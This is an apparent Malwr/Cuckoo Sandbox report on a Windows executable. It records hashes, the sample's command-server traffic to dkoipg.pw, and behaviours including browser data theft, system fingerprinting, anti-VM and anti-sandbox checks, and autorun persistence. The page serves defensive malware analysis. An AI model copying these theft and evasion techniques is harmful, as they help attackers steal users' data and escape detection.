<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Malwr - Malware Analysis by Cuckoo Sandbox</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="Submit malware for free analysis with Cuckoo Sandbox">
<meta name="keywords" content="sandbox, malware, online, submit, analysis, cuckoo, sample, download, trojan, apt">

<!-- Le styles -->
<link href="/static/css/bootstrap.min.css" rel="stylesheet">
<link href="/static/css/bootstrap-responsive.min.css" rel="stylesheet">
<link href="/static/css/style.css" rel="stylesheet">
<link href="/static/css/lightbox.css" rel="stylesheet">
<link href="/static/css/jasny-bootstrap.min.css" rel="stylesheet">
<link href="/static/css/jasny-bootstrap-responsive.min.css" rel="stylesheet">
<script src="/static/js/jquery.js"></script>
</head>
<body>
<div class="navbar navbar-inverse navbar-fixed-top">
<div class="navbar-inner">
<div class="container-fluid">
<a class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</a>
<div class="nav-collapse">
<ul class="nav">
<li><a href="/"><i class="icon icon-home icon-white"></i></a></li>
<li><a href="/analysis/">Analyses</a></li>
<li><a href="/account/login/">Search</a></li>
<!-- <li><a href="/repository/">Repository</a></li> -->
<li><a href="/submission/">Submit</a></li>
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown">About <b class="caret"></b></a>
<ul class="dropdown-menu">
<li><a href="/about/">About</a></li>
<li><a href="http://blog.malwr.com">Blog</a></li>
<li><a href="/about/terms/">Terms of Service</a></li>
</ul>
</li>
</ul>
<ul class="nav pull-right">

<li><a href="/account/signup/">Sign up</a></li>
<li><a href="/account/login/">Login</a></li>

</ul>
</div>
</div>
</div>
</div>
<div class="container-fluid">




<p style="margin-bottom: 25px;"><img src="/static/graphic/malwr.png" /></p>

<div class="tabbable tabs-left">
<ul class="nav nav-tabs">
<li class="active"><a href="#overview" data-toggle="tab">Quick Overview</a></li>
<li><a href="#static" data-toggle="tab">Static Analysis</a></li>
<li><a href="#behavior" data-toggle="tab" id="graph_hook">Behavioral Analysis</a></li>
<li><a href="#network" data-toggle="tab">Network Analysis</a></li>
<li><a href="#dropped" data-toggle="tab">Dropped Files</a></li>
<li><a href="#comments" data-toggle="tab">Comment Board (0)</a></li>
</ul>
<div class="tab-content">
<div class="tab-pane fade in active" id="overview">
<p align="center"><a href="https://flattr.com/submit/auto?user_id=malwr&url=http://malwr.com/analysis/Y2FlZWEzODJhODJhNDE2NGI5OTIyNjc0NDZhODNjMjY/&title=e1a9b6f7285a85e682ebcad028472d13&description=Malware analysis of file 65fg67n with MD5 e1a9b6f7285a85e682ebcad028472d13&language=en_GB&tags=malwr,malware,analysis,e1a9b6f7285a85e682ebcad028472d13,&category=text"><img src="https://api.flattr.com/button/flattr-badge-large.png" alt="Flattr this analysis!" /></a></p>



<div class="alert alert-info">
<b>Tags</b>:
None
</div>

<section id="information">
<div class="box">
<h4>Analysis</h4>
<div class="box-content" style="padding: 0;">
<table class="table table-striped">
<thead>
<tr>
<th>Category</th>
<th>Started</th>
<th>Completed</th>
<th>Duration</th>
</tr>
</thead>
<tbody>
<tr>
<td>FILE</td>
<td>2016-02-17 02:41:33</td>
<td>2016-02-17 02:43:52</td>
<td>139 seconds</td>
</tr>
</tbody>
</table>
</div>
</div>

</section>
<hr />

<section id="file">
<h4>File Details</h4>
<div class="box">
<div class="box-content" style="padding: 0;">
<table class="table table-striped">
<tr>
<th style="border-top: 0;">File Name</th>
<td style="border-top: 0;">65fg67n</td>
</tr>
<tr>
<th>File Size</th>
<td>208896 bytes</td>
</tr>
<tr>
<th>File Type</th>
<td>PE32 executable (GUI) Intel 80386, for MS Windows</td>
</tr>
<tr>
<th>MD5</th>
<td>e1a9b6f7285a85e682ebcad028472d13</td>
</tr>
<tr>
<th>SHA1</th>
<td>1347b810ac90c13154908f7cf45b11913c182e44</td>
</tr>
<tr>
<th>SHA256</th>
<td>5e945c1d27c9ad77a2b63ae10af46aee7d29a6a43605a9bfbf35cebbcff184d8</td>
</tr>
<tr>
<th>SHA512</th>
<td>35e6adb72faba256c94a7abe205ff14752f46c830292905e24605a479d15b6aa6b4ccfcc6d4937dfad8698cfa8da4a4cd68b38ded5c14ed24127f605c6fe6874</td>
</tr>
<tr>
<th>CRC32</th>
<td>E4BE5457</td>
</tr>
<tr>
<th>Ssdeep</th>
<td>3072:esOe84dmDsobhW7CfhQ7J37HBWTH6sDq2bEGKPe59jLi7TuKmx5wxv+18:jr84+sqhkCepzBW3bNV5408</td>
</tr>
<tr>
<th>Yara</th>
<td>
None matched
</td>
</tr>
<tr>
<th></th>
<td><button type="button" class="btn btn-primary btn-small" href="#" disabled="disabled">Download</button> <small><span class="muted">You need to login</span></small></td>
</tr>
</table>
</div>
</div>
</section>

<hr />
<style type="text/css">
.signature {
padding: 5px;
padding-left: 10px;
margin-bottom: 5px;
}
</style>
<section id="signatures">
<h4>Signatures</h4>
<a style="text-decoration: none;" href="#signature_antivirus_virustotal" data-toggle="collapse">
<div class="alert signature">
File has been identified by at least one AntiVirus on VirusTotal as malicious</div></a>
<div id="signature_antivirus_virustotal" class="collapse">
</div>
<a style="text-decoration: none;" href="#signature_network_http" data-toggle="collapse">
<div class="alert signature">
Performs some HTTP requests</div></a>
<div id="signature_network_http" class="collapse">
<div><b>process</b>: None</div>
<div><b>signs</b>: [{u&#39;type&#39;: u&#39;http&#39;, u&#39;value&#39;: {u&#39;count&#39;: 1, u&#39;body&#39;: u&#39;\\xbf\\x9f\\x0e\\xa1\\xf5t\\xe5\\xbasCP\\xd7/\\xcb\\x81\\x8e^\\x84\\xc6\\xd4\\xef\\x11\\xd1\\x93\\xf8\\x90h\\xf6\\xc1\\x82\\xefOY~\\x17*\\xc5\\xda\\x80\\x84H:\\x8d\\xf9\\x1e+=\\x1c\\xa1\\xf9~Y\\x13\\x13\\x9a\\x90U\\x8d\\x99\\x14aG\\xa3\\xd2\\xd2\\x98o\\x16\\xba\\xed\\xc9\\xfe\\xee\\xdd\\x8d\\x8e\\xfa\\xc9\\x01e&amp;;\\xca.{\\xd4\\xa8\\xa7\\x11R\\x0b\\xb4\\xd9z_&#39;, u&#39;uri&#39;: u&#39;http://dkoipg.pw/main.php&#39;, u&#39;port&#39;: 80, u&#39;host&#39;: u&#39;dkoipg.pw&#39;, u&#39;version&#39;: u&#39;1.1&#39;, u&#39;path&#39;: u&#39;/main.php&#39;, u&#39;data&#39;: u&#39;POST /main.php HTTP/1.1\r\nHost: dkoipg.pw\r\nContent-Length: 95\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n\\xbf\\x9f\\x0e\\xa1\\xf5t\\xe5\\xbasCP\\xd7/\\xcb\\x81\\x8e^\\x84\\xc6\\xd4\\xef\\x11\\xd1\\x93\\xf8\\x90h\\xf6\\xc1\\x82\\xefOY~\\x17*\\xc5\\xda\\x80\\x84H:\\x8d\\xf9\\x1e+=\\x1c\\xa1\\xf9~Y\\x13\\x13\\x9a\\x90U\\x8d\\x99\\x14aG\\xa3\\xd2\\xd2\\x98o\\x16\\xba\\xed\\xc9\\xfe\\xee\\xdd\\x8d\\x8e\\xfa\\xc9\\x01e&amp;;\\xca.{\\xd4\\xa8\\xa7\\x11R\\x0b\\xb4\\xd9z_&#39;, u&#39;method&#39;: u&#39;POST&#39;}}, {u&#39;type&#39;: u&#39;http&#39;, u&#39;value&#39;: {u&#39;count&#39;: 1, u&#39;body&#39;: u&#39;v\\x8a\\x9eF\\xb3h4B(.%\\x1c\\xe6V\\x0b)\\xec\\xddj\\x82\\xc4\\x84\\x9b6*y\\x9c\\x8c\\xfb\\x9f\\xe0\\xcb\\x98\\x91\\xeaK\\x8a~Nc/\\xc2\\xdc\\xa4i\\xc43\\xb0\\xe5\\\\xff\\xb4\\xfei@\\x84\\xfeZv.\\xc7\\x04X\\x87\\xf7\\xc6\\x9a\\xa5\\xc0\\x8dC@?\\xbb\\xf0\\xad\\xc3\\xa6\\xdc1:$\\xc3)b\\xcafz\\x9b\\xca`K\\xc7]\\xc8\\x03\\x802:\\xabA&#39;, u&#39;uri&#39;: u&#39;http://dkoipg.pw/main.php&#39;, u&#39;port&#39;: 80, u&#39;host&#39;: u&#39;dkoipg.pw&#39;, u&#39;version&#39;: u&#39;1.1&#39;, u&#39;path&#39;: u&#39;/main.php&#39;, u&#39;data&#39;: u&#39;POST /main.php HTTP/1.1\r\nHost: dkoipg.pw\r\nContent-Length: 101\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nv\\x8a\\x9eF\\xb3h4B(.%\\x1c\\xe6V\\x0b)\\xec\\xddj\\x82\\xc4\\x84\\x9b6*y\\x9c\\x8c\\xfb\\x9f\\xe0\\xcb\\x98\\x91\\xeaK\\x8a~Nc/\\xc2\\xdc\\xa4i\\xc43\\xb0\\xe5\\\\xff\\xb4\\xfei@\\x84\\xfeZv.\\xc7\\x04X\\x87\\xf7\\xc6\\x9a\\xa5\\xc0\\x8dC@?\\xbb\\xf0\\xad\\xc3\\xa6\\xdc1:$\\xc3)b\\xcafz\\x9b\\xca`K\\xc7]\\xc8\\x03\\x802:\\xabA&#39;, u&#39;method&#39;: u&#39;POST&#39;}}, {u&#39;type&#39;: u&#39;http&#39;, u&#39;value&#39;: {u&#39;count&#39;: 1, u&#39;body&#39;: u&quot;\\xb7\\x8e\\x92\\xf0\\xc8\\xf1\\xf3[7\\xa9\\xbc\\xc4M&gt;\\xf0\\x13\\xad\\xfdz\n\\x00\\xe6\\xaa.&amp;\\xff_m\\x8b&#39;\\xbce\\xca\\xc8&gt;\\xb1\\x1f72\\xed\\xd0\r{\\xe8\\x00q\\xbb\\x1a\\x19\\xa0\\x85\\x89\\xe10\\x0f&quot;, u&#39;uri&#39;: u&#39;http://dkoipg.pw/main.php&#39;, u&#39;port&#39;: 80, u&#39;host&#39;: u&#39;dkoipg.pw&#39;, u&#39;version&#39;: u&#39;1.1&#39;, u&#39;path&#39;: u&#39;/main.php&#39;, u&#39;data&#39;: u&quot;POST /main.php HTTP/1.1\r\nHost: dkoipg.pw\r\nContent-Length: 55\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n\\xb7\\x8e\\x92\\xf0\\xc8\\xf1\\xf3[7\\xa9\\xbc\\xc4M&gt;\\xf0\\x13\\xad\\xfdz\n\\x00\\xe6\\xaa.&amp;\\xff_m\\x8b&#39;\\xbce\\xca\\xc8&gt;\\xb1\\x1f72\\xed\\xd0\r{\\xe8\\x00q\\xbb\\x1a\\x19\\xa0\\x85\\x89\\xe10\\x0f&quot;, u&#39;method&#39;: u&#39;POST&#39;}}]</div>
</div>
<a style="text-decoration: none;" href="#signature_antivm_generic_bios" data-toggle="collapse">
<div class="alert alert-error signature">
Checks the version of Bios, possibly for anti-virtualization</div></a>
<div id="signature_antivm_generic_bios" class="collapse">
<div><b>process</b>: {u&#39;process_name&#39;: u&#39;65fg67n.exe&#39;, u&#39;process_id&#39;: 1592}</div>
<div><b>signs</b>: [{u&#39;type&#39;: u&#39;api&#39;, u&#39;value&#39;: {u&#39;category&#39;: u&#39;registry&#39;, u&#39;status&#39;: True, u&#39;return&#39;: u&#39;0x00000000&#39;, u&#39;timestamp&#39;: u&#39;2016-02-16 17:41:35,193&#39;, u&#39;thread_id&#39;: u&#39;452&#39;, u&#39;repeated&#39;: 0, u&#39;api&#39;: u&#39;RegQueryValueExA&#39;, u&#39;arguments&#39;: [{u&#39;name&#39;: u&#39;Handle&#39;, u&#39;value&#39;: u&#39;0x00000088&#39;}, {u&#39;name&#39;: u&#39;Data&#39;, u&#39;value&#39;: u&#39;&#39;}, {u&#39;name&#39;: u&#39;ValueName&#39;, u&#39;value&#39;: u&#39;SystemBiosVersion&#39;}], u&#39;id&#39;: 79}}]</div>
</div>
<a style="text-decoration: none;" href="#signature_antisandbox_sleep" data-toggle="collapse">
<div class="alert alert-error signature">
A process attempted to delay the analysis task by a long amount of time.</div></a>
<div id="signature_antisandbox_sleep" class="collapse">
<div><b>Process</b>: rundll32.exe tried to sleep 1566804 seconds, actually delayed analysis time by 0 seconds</div>
</div>
<a style="text-decoration: none;" href="#signature_infostealer_browser" data-toggle="collapse">
<div class="alert alert-error signature">
Steals private information from local Internet browsers</div></a>
<div id="signature_infostealer_browser" class="collapse">
<div><b>process</b>: {u&#39;process_name&#39;: u&#39;65fg67n.exe&#39;, u&#39;process_id&#39;: 1592}</div>
<div><b>signs</b>: [{u&#39;type&#39;: u&#39;api&#39;, u&#39;value&#39;: {u&#39;category&#39;: u&#39;filesystem&#39;, u&#39;status&#39;: True, u&#39;return&#39;: u&#39;0x00000000&#39;, u&#39;timestamp&#39;: u&#39;2016-02-16 17:41:35,313&#39;, u&#39;thread_id&#39;: u&#39;452&#39;, u&#39;repeated&#39;: 0, u&#39;api&#39;: u&#39;NtCreateFile&#39;, u&#39;arguments&#39;: [{u&#39;name&#39;: u&#39;ShareAccess&#39;, u&#39;value&#39;: u&#39;3&#39;}, {u&#39;name&#39;: u&#39;FileName&#39;, u&#39;value&#39;: u&#39;C:\\Documents and Settings\\User\\Local Settings\\History\\History.IE5\\index.dat&#39;}, {u&#39;name&#39;: u&#39;DesiredAccess&#39;, u&#39;value&#39;: u&#39;0xc0100080&#39;}, {u&#39;name&#39;: u&#39;CreateDisposition&#39;, u&#39;value&#39;: u&#39;3&#39;}, {u&#39;name&#39;: u&#39;FileHandle&#39;, u&#39;value&#39;: u&#39;0x000000e8&#39;}], u&#39;id&#39;: 604}}]</div>
<div><b>process</b>: {u&#39;process_name&#39;: u&#39;65fg67n.exe&#39;, u&#39;process_id&#39;: 1592}</div>
<div><b>signs</b>: [{u&#39;type&#39;: u&#39;api&#39;, u&#39;value&#39;: {u&#39;category&#39;: u&#39;filesystem&#39;, u&#39;status&#39;: True, u&#39;return&#39;: u&#39;0x00000000&#39;, u&#39;timestamp&#39;: u&#39;2016-02-16 17:41:35,313&#39;, u&#39;thread_id&#39;: u&#39;452&#39;, u&#39;repeated&#39;: 0, u&#39;api&#39;: u&#39;NtCreateFile&#39;, u&#39;arguments&#39;: [{u&#39;name&#39;: u&#39;ShareAccess&#39;, u&#39;value&#39;: u&#39;3&#39;}, {u&#39;name&#39;: u&#39;FileName&#39;, u&#39;value&#39;: u&#39;C:\\Documents and Settings\\User\\Local Settings\\History\\History.IE5\\index.dat&#39;}, {u&#39;name&#39;: u&#39;DesiredAccess&#39;, u&#39;value&#39;: u&#39;0xc0100080&#39;}, {u&#39;name&#39;: u&#39;CreateDisposition&#39;, u&#39;value&#39;: u&#39;3&#39;}, {u&#39;name&#39;: u&#39;FileHandle&#39;, u&#39;value&#39;: u&#39;0x000000e8&#39;}], u&#39;id&#39;: 607}}]</div>
</div>
<a style="text-decoration: none;" href="#signature_recon_fingerprint" data-toggle="collapse">
<div class="alert alert-error signature">
Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate)</div></a>
<div id="signature_recon_fingerprint" class="collapse">
<div><b>process</b>: {u&#39;process_name&#39;: u&#39;65fg67n.exe&#39;, u&#39;process_id&#39;: 1592}</div>
<div><b>signs</b>: [{u&#39;type&#39;: u&#39;api&#39;, u&#39;value&#39;: {u&#39;category&#39;: u&#39;registry&#39;, u&#39;status&#39;: True, u&#39;return&#39;: u&#39;0x00000000&#39;, u&#39;timestamp&#39;: u&#39;2016-02-16 17:41:35,293&#39;, u&#39;thread_id&#39;: u&#39;452&#39;, u&#39;repeated&#39;: 0, u&#39;api&#39;: u&#39;RegQueryValueExA&#39;, u&#39;arguments&#39;: [{u&#39;name&#39;: u&#39;Handle&#39;, u&#39;value&#39;: u&#39;0x000000c4&#39;}, {u&#39;name&#39;: u&#39;DataLength&#39;, u&#39;value&#39;: u&#39;37&#39;}, {u&#39;name&#39;: u&#39;ValueName&#39;, u&#39;value&#39;: u&#39;MachineGuid&#39;}, {u&#39;name&#39;: u&#39;Type&#39;, u&#39;value&#39;: u&#39;1&#39;}], u&#39;id&#39;: 379}}]</div>
<div><b>process</b>: {u&#39;process_name&#39;: u&#39;65fg67n.exe&#39;, u&#39;process_id&#39;: 1592}</div>
<div><b>signs</b>: [{u&#39;type&#39;: u&#39;api&#39;, u&#39;value&#39;: {u&#39;category&#39;: u&#39;registry&#39;, u&#39;status&#39;: True, u&#39;return&#39;: u&#39;0x00000000&#39;, u&#39;timestamp&#39;: u&#39;2016-02-16 17:41:35,293&#39;, u&#39;thread_id&#39;: u&#39;452&#39;, u&#39;repeated&#39;: 0, u&#39;api&#39;: u&#39;RegQueryValueExA&#39;, u&#39;arguments&#39;: [{u&#39;name&#39;: u&#39;Handle&#39;, u&#39;value&#39;: u&#39;0x000000c4&#39;}, {u&#39;name&#39;: u&#39;Data&#39;, u&#39;value&#39;: u&#39;e97bd94f-e805-4c92-9982-42f7c80101bf\\x00&#39;}, {u&#39;name&#39;: u&#39;ValueName&#39;, u&#39;value&#39;: u&#39;MachineGuid&#39;}], u&#39;id&#39;: 380}}]</div>
<div><b>process</b>: {u&#39;process_name&#39;: u&#39;65fg67n.exe&#39;, u&#39;process_id&#39;: 1592}</div>
<div><b>signs</b>: [{u&#39;type&#39;: u&#39;api&#39;, u&#39;value&#39;: {u&#39;category&#39;: u&#39;registry&#39;, u&#39;status&#39;: True, u&#39;return&#39;: u&#39;0x00000000&#39;, u&#39;timestamp&#39;: u&#39;2016-02-16 17:41:35,303&#39;, u&#39;thread_id&#39;: u&#39;452&#39;, u&#39;repeated&#39;: 0, u&#39;api&#39;: u&#39;RegQueryValueExA&#39;, u&#39;arguments&#39;: [{u&#39;name&#39;: u&#39;Handle&#39;, u&#39;value&#39;: u&#39;0x000000c8&#39;}, {u&#39;name&#39;: u&#39;DataLength&#39;, u&#39;value&#39;: u&#39;37&#39;}, {u&#39;name&#39;: u&#39;ValueName&#39;, u&#39;value&#39;: u&#39;MachineGuid&#39;}, {u&#39;name&#39;: u&#39;Type&#39;, u&#39;value&#39;: u&#39;1&#39;}], u&#39;id&#39;: 433}}]</div>
<div><b>process</b>: {u&#39;process_name&#39;: u&#39;65fg67n.exe&#39;, u&#39;process_id&#39;: 1592}</div>
<div><b>signs</b>: [{u&#39;type&#39;: u&#39;api&#39;, u&#39;value&#39;: {u&#39;category&#39;: u&#39;registry&#39;, u&#39;status&#39;: True, u&#39;return&#39;: u&#39;0x00000000&#39;, u&#39;timestamp&#39;: u&#39;2016-02-16 17:41:35,303&#39;, u&#39;thread_id&#39;: u&#39;452&#39;, u&#39;repeated&#39;: 0, u&#39;api&#39;: u&#39;RegQueryValueExA&#39;, u&#39;arguments&#39;: [{u&#39;name&#39;: u&#39;Handle&#39;, u&#39;value&#39;: u&#39;0x000000c8&#39;}, {u&#39;name&#39;: u&#39;Data&#39;, u&#39;value&#39;: u&#39;e97bd94f-e805-4c92-9982-42f7c80101bf\\x00&#39;}, {u&#39;name&#39;: u&#39;ValueName&#39;, u&#39;value&#39;: u&#39;MachineGuid&#39;}], u&#39;id&#39;: 434}}]</div>
<div><b>process</b>: {u&#39;process_name&#39;: u&#39;65fg67n.exe&#39;, u&#39;process_id&#39;: 1592}</div>
<div><b>signs</b>: [{u&#39;type&#39;: u&#39;api&#39;, u&#39;value&#39;: {u&#39;category&#39;: u&#39;registry&#39;, u&#39;status&#39;: True, u&#39;return&#39;: u&#39;0x00000000&#39;, u&#39;timestamp&#39;: u&#39;2016-02-16 17:41:39,499&#39;, u&#39;thread_id&#39;: u&#39;768&#39;, u&#39;repeated&#39;: 0, u&#39;api&#39;: u&#39;RegQueryValueExA&#39;, u&#39;arguments&#39;: [{u&#39;name&#39;: u&#39;Handle&#39;, u&#39;value&#39;: u&#39;0x000001a4&#39;}, {u&#39;name&#39;: u&#39;DataLength&#39;, u&#39;value&#39;: u&#39;37&#39;}, {u&#39;name&#39;: u&#39;ValueName&#39;, u&#39;value&#39;: u&#39;MachineGuid&#39;}, {u&#39;name&#39;: u&#39;Type&#39;, u&#39;value&#39;: u&#39;1&#39;}], u&#39;id&#39;: 6235}}]</div>
<div><b>process</b>: {u&#39;process_name&#39;: u&#39;65fg67n.exe&#39;, u&#39;process_id&#39;: 1592}</div>
<div><b>signs</b>: [{u&#39;type&#39;: u&#39;api&#39;, u&#39;value&#39;: {u&#39;category&#39;: u&#39;registry&#39;, u&#39;status&#39;: True, u&#39;return&#39;: u&#39;0x00000000&#39;, u&#39;timestamp&#39;: u&#39;2016-02-16 17:41:39,499&#39;, u&#39;thread_id&#39;: u&#39;768&#39;, u&#39;repeated&#39;: 0, u&#39;api&#39;: u&#39;RegQueryValueExA&#39;, u&#39;arguments&#39;: [{u&#39;name&#39;: u&#39;Handle&#39;, u&#39;value&#39;: u&#39;0x000001a4&#39;}, {u&#39;name&#39;: u&#39;Data&#39;, u&#39;value&#39;: u&#39;e97bd94f-e805-4c92-9982-42f7c80101bf\\x00&#39;}, {u&#39;name&#39;: u&#39;ValueName&#39;, u&#39;value&#39;: u&#39;MachineGuid&#39;}], u&#39;id&#39;: 6236}}]</div>
</div>
<a style="text-decoration: none;" href="#signature_persistence_autorun" data-toggle="collapse">
<div class="alert alert-error signature">
Installs itself for autorun at Windows startup</div></a>
<div id="signature_persistence_autorun" class="collapse">
<div><b>process</b>: None</div>
<div><b>signs</b>: [{u&#39;type&#39;: u&#39;registry&#39;, u&#39;value&#39;: u&#39;HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run&#39;}]</div>
<div><b>process</b>: None</div>
<div><b>signs</b>: [{u&#39;type&#39;: u&#39;registry&#39;, u&#39;value&#39;: u&#39;HKEY_USERS\\S-1-5-21-1547161642-507921405-839522115-1004\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon&#39;}]</div>
<div><b>process</b>: None</div>
<div><b>signs</b>: [{u&#39;type&#39;: u&#39;registry&#39;, u&#39;value&#39;: u&#39;HKEY_LOCAL_MACHINE\\system\\CurrentControlSet\\services\\RDPNP\\NetworkProvider&#39;}]</div>
<div><b>process</b>: None</div>
<div><b>signs</b>: [{u&#39;type&#39;: u&#39;file&#39;, u&#39;value&#39;: u&#39;c:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup&#39;}]</div>
</div>
</section>
<hr />

<section id="screenshots">
<h4>Screenshots</h4>
<div>
<a rel="lightbox" href="/analysis/file/Y2FlZWEzODJhODJhNDE2NGI5OTIyNjc0NDZhODNjMjY/screenshot/2c0d1728bd6cd042eb0270f26a6ffb1fb88aa7467d4147b422d31bf1c630b04a/"><img class="opaque" rel="lightbox" src="/analysis/file/Y2FlZWEzODJhODJhNDE2NGI5OTIyNjc0NDZhODNjMjY/screenshot/2c0d1728bd6cd042eb0270f26a6ffb1fb88aa7467d4147b422d31bf1c630b04a/" style="height: 120px;" /></a>
<a rel="lightbox" href="/analysis/file/Y2FlZWEzODJhODJhNDE2NGI5OTIyNjc0NDZhODNjMjY/screenshot/0eaaeb9a2f84ff2abe8f1bbc8664b2fc8b2ac80776035d82d34aa75abba9c486/"><img class="opaque" rel="lightbox" src="/analysis/file/Y2FlZWEzODJhODJhNDE2NGI5OTIyNjc0NDZhODNjMjY/screenshot/0eaaeb9a2f84ff2abe8f1bbc8664b2fc8b2ac80776035d82d34aa75abba9c486/" style="height: 120px;" /></a>
<a rel="lightbox" href="/analysis/file/Y2FlZWEzODJhODJhNDE2NGI5OTIyNjc0NDZhODNjMjY/screenshot/e394f4425c11621b2e6e3e73426076a48c5878b8bc194c8296d9a17569e11945/"><img class="opaque" rel="lightbox" src="/analysis/file/Y2FlZWEzODJhODJhNDE2NGI5OTIyNjc0NDZhODNjMjY/screenshot/e394f4425c11621b2e6e3e73426076a48c5878b8bc194c8296d9a17569e11945/" style="height: 120px;" /></a>
<a rel="lightbox" href="/analysis/file/Y2FlZWEzODJhODJhNDE2NGI5OTIyNjc0NDZhODNjMjY/screenshot/db93b8fc19d25784dc5f86929db7583564e6988173cd2db491fb4369c0daf81c/"><img class="opaque" rel="lightbox" src="/analysis/file/Y2FlZWEzODJhODJhNDE2NGI5OTIyNjc0NDZhODNjMjY/screenshot/db93b8fc19d25784dc5f86929db7583564e6988173cd2db491fb4369c0daf81c/" style="height: 120px;" /></a>
</div>
</section>
<hr />
<div class="row-fluid">
<div class="span6"><section id="hosts">
<h4>Hosts</h4>
<table class="table table-striped table-bordered">
<tr>
<th>IP</th>
</tr>
<tr>
<td>85.25.149.246</td>
</tr>
</table>
</section>
</div>
<div class="span6"><section id="domains">
<h4>Domains</h4>
<table class="table table-striped table-bordered">
<tr>
<th>Domain</th>
<th>IP</th>
</tr>
<tr>
<td>dkoipg.pw</td>
<td>85.25.149.246</td>
</tr>
</table>
</section>
</div>
</div>
<hr />
<section id="summary">
<h4>Summary</h4>
<div class="tabbable tabs">
<ul class="nav nav-pills" style="margin-bottom: 0;">
<li class="active"><a href="#summary_files" data-toggle="tab">Files</a></li>
<li><a href="#summary_keys" data-toggle="tab">Registry Keys</a></li>
<li><a href="#summary_mutexes" data-toggle="tab">Mutexes</a></li>
</ul>
<div class="tab-content">
<div class="tab-pane fade in active" id="summary_files">
<div class="well mono">
C:\<br />
C:\WINDOWS<br />
C:\WINDOWS\<br />
C:<br />
MountPointManager<br />
C:\WINDOWS\system32\rsaenh.dll<br />
PIPE\lsarpc<br />
C:\Documents and Settings\User\Local Settings\Temporary Internet Files<br />
C:\Documents and Settings\User\Local Settings\History<br />
C:\Documents and Settings\User\Local Settings\Temporary Internet Files\Content.IE5\<br />
C:\Documents and Settings\User\Local Settings\Temporary Internet Files\Content.IE5\index.dat<br />
C:\Documents and Settings\User\Cookies\<br />
C:\Documents and Settings\User\Cookies\index.dat<br />
C:\Documents and Settings\User\Local Settings\History\History.IE5\<br />
C:\Documents and Settings\User\Local Settings\History\History.IE5\index.dat<br />
c:\autoexec.bat<br />
C:\Documents and Settings<br />
C:\Documents and Settings\User\Local Settings<br />
C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Connections\Pbk\*.pbk<br />
C:\WINDOWS\system32\Ras\*.pbk<br />
C:\Documents and Settings\User\Application Data\Microsoft\Network\Connections\Pbk\*.pbk<br />
c:\*<br />
C:\DOCUME~1\User\LOCALS~1\Temp<br />
c:\Documents and Settings\*<br />
c:\Documents and Settings<br />
c:\Documents and Settings\All Users\*<br />
c:\Documents and Settings\All Users<br />
c:\Documents and Settings\All Users\Desktop\*<br />
c:\Documents and Settings\All Users\Desktop<br />
c:\Documents and Settings\All Users\Documents\*<br />
c:\Documents and Settings\All Users\Documents<br />
c:\Documents and Settings\All Users\Documents\My Music\*<br />
c:\Documents and Settings\All Users\Documents\My Music<br />
c:\Documents and Settings\All Users\Documents\My Music\My Playlists\*<br />
c:\Documents and Settings\All Users\Documents\My Music\My Playlists<br />
c:\Documents and Settings\All Users\Documents\My Music\Sample Music\*<br />
c:\Documents and Settings\All Users\Documents\My Music\Sample Music<br />
c:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\*<br />
c:\Documents and Settings\All Users\Documents\My Music\Sample Playlists<br />
c:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\0007907E\*<br />
c:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\0007907E<br />
c:\Documents and Settings\All Users\Documents\My Pictures\*<br />
c:\Documents and Settings\All Users\Documents\My Pictures<br />
c:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\*<br />
c:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures<br />
c:\Documents and Settings\All Users\Documents\My Videos\*<br />
c:\Documents and Settings\All Users\Documents\My Videos<br />
c:\Documents and Settings\All Users\Favorites\*<br />
c:\Documents and Settings\All Users\Favorites<br />
c:\Documents and Settings\All Users\Start Menu\*<br />
c:\Documents and Settings\All Users\Start Menu<br />
c:\Documents and Settings\All Users\Start Menu\Programs\*<br />
c:\Documents and Settings\All Users\Start Menu\Programs<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Accessories\*<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Accessories<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Accessibility\*<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Accessibility<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Communications\*<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Communications<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Entertainment\*<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Entertainment<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Accessories\System Tools\*<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Accessories\System Tools<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Administrative Tools\*<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Administrative Tools<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Games\*<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Games<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Microsoft Office\*<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Microsoft Office<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Microsoft Office\Microsoft Office Tools\*<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Microsoft Office\Microsoft Office Tools<br />
c:\Documents and Settings\All Users\Start Menu\Programs\PHP 5\*<br />
c:\Documents and Settings\All Users\Start Menu\Programs\PHP 5<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Python 2.7\*<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Python 2.7<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Startup\*<br />
c:\Documents and Settings\All Users\Start Menu\Programs\Startup<br />
